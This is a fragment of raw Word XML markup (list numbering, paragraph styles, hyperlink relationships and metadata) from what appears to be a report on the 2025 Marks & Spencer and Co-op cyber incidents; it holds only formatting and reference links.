    <w:lvl w:ilvl="4" w:tplc="99FA9E7C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3370" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6E60DD10">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="69B47548">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5270" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EB5CA936">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6221" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2ACC4F00">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7171" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45767808"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="532C3674"/>
    <w:lvl w:ilvl="0" w:tplc="48541F0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="321" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="113"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AD5883C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1195" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="10225D56">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2070" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="30020C1A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2945" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A1BAD182">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3820" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E554640E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4695" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D04A5792">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5570" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D37270CA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6446" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="935E0A9A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7321" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="47B10724"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="497C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451C19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F3C7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A51FEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43D24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D26B64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36E44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873984"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56F46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DF60E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197E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FE54FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE160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227B5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C926D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1FA6270"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F3AB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1D3F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCDC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6384040">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="145123357">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="151871913">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1581792387">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1766804661">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1818448993">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1947880598">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="531190802">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="561913204">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="929659466">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="93326373">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="459567879">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="78716747">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1586188017">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1858275627">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="915355591">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1503624156">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1024021334">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1008171574">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="703945428">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1737627328">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="279380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36"/>
    <w:rsid w:val="00027FDF"/>
    <w:rsid w:val="00053404"/>
    <w:rsid w:val="0009137A"/>
    <w:rsid w:val="000B4C80"/>
    <w:rsid w:val="000C1615"/>
    <w:rsid w:val="00100EEB"/>
    <w:rsid w:val="00115C04"/>
    <w:rsid w:val="00162430"/>
    <w:rsid w:val="001F5F36"/>
    <w:rsid w:val="0020761A"/>
    <w:rsid w:val="00236891"/>
    <w:rsid w:val="00335216"/>
    <w:rsid w:val="00340F08"/>
    <w:rsid w:val="0036732C"/>
    <w:rsid w:val="003A1065"/>
    <w:rsid w:val="003C3AB1"/>
    <w:rsid w:val="00424DAD"/>
    <w:rsid w:val="00431F78"/>
    <w:rsid w:val="0043542B"/>
    <w:rsid w:val="004859A7"/>
    <w:rsid w:val="00493E45"/>
    <w:rsid w:val="004B6007"/>
    <w:rsid w:val="004E0A72"/>
    <w:rsid w:val="004F0197"/>
    <w:rsid w:val="004F48E8"/>
    <w:rsid w:val="00515A10"/>
    <w:rsid w:val="00527136"/>
    <w:rsid w:val="00572A20"/>
    <w:rsid w:val="005A4967"/>
    <w:rsid w:val="005D1B03"/>
    <w:rsid w:val="005F13C8"/>
    <w:rsid w:val="006218ED"/>
    <w:rsid w:val="006315F9"/>
    <w:rsid w:val="00735442"/>
    <w:rsid w:val="0076698F"/>
    <w:rsid w:val="007864B5"/>
    <w:rsid w:val="007A6FB6"/>
    <w:rsid w:val="007B1C33"/>
    <w:rsid w:val="00810208"/>
    <w:rsid w:val="008409AF"/>
    <w:rsid w:val="0085330D"/>
    <w:rsid w:val="008E143C"/>
    <w:rsid w:val="009042DB"/>
    <w:rsid w:val="00905635"/>
    <w:rsid w:val="0093252F"/>
    <w:rsid w:val="00966AF2"/>
    <w:rsid w:val="00981222"/>
    <w:rsid w:val="009B17B1"/>
    <w:rsid w:val="009E658F"/>
    <w:rsid w:val="00A000BA"/>
    <w:rsid w:val="00A453E9"/>
    <w:rsid w:val="00AC7112"/>
    <w:rsid w:val="00B16175"/>
    <w:rsid w:val="00BE6727"/>
    <w:rsid w:val="00C0063E"/>
    <w:rsid w:val="00CB2C98"/>
    <w:rsid w:val="00CC10EA"/>
    <w:rsid w:val="00D00000"/>
    <w:rsid w:val="00D014A0"/>
    <w:rsid w:val="00D038B0"/>
    <w:rsid w:val="00D3632C"/>
    <w:rsid w:val="00D67D43"/>
    <w:rsid w:val="00DC115F"/>
    <w:rsid w:val="00E32A84"/>
    <w:rsid w:val="00E76390"/>
    <w:rsid w:val="00EB2E5F"/>
    <w:rsid w:val="00F16CB9"/>
    <w:rsid w:val="00F51FC7"/>
    <w:rsid w:val="00F6106A"/>
    <w:rsid w:val="00FB180E"/>
    <w:rsid w:val="00FB43C4"/>
    <w:rsid w:val="00FF16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6203E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F4B57F57-C0F1-42EB-A4A1-3E2F03478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1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271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271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71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71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7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1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271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271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71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71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7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136"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00527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136"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00527136"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00527136"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00527136"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005271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7136"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00527136"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="highlights">
    <w:name w:val="highlights"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A453E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FB180E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="194" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="321" w:hanging="298"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="521"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00115C04"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C0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115C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C04"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C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orporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update-0" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=https://www.researchgate.net/publication/396199216" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bbc.com/news/articles/cql0ple066po"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nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrod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pecopssoft.com/blog/marks-spencer-ransomware-active-directory/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.coop.co.uk/cyber-incident" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/news/retailers-inciden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isf.ie/files/UserFiles/Cyber-technical-guides/Scattered-Spider-and-MandS-Incident_.pdf" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://corporate.marksandspencer.com/cyber-update" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/publications/enisa-threat-landscape-202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o-operative.coop/media/news-releases/cyber-incident-upd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co.org.uk/about-the-ico/media-centre/news-and-blogs/2025/05/statement-on-cyber-incidents-impacting-retailers/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://corporate.marksandspencer.com/sites/marksandspencer/files/2025-05/Marks-and-Spencer-Group-plc-Annual-Report-and-Financial-Statements-2025_INTERACTIVE_FINAL.pdf" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attack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rporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.co-operative.coop/media/news-releases/co-ops-underlying-strength-allows-the-group-to-navigate-external-pressures" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-6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742F4-5A3D-42B6-8DE6-0FD6856C3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37</Pages>
  <Words>5569</Words>
  <Characters>31747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Khushi Sangani</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-29T21:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-30T10:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>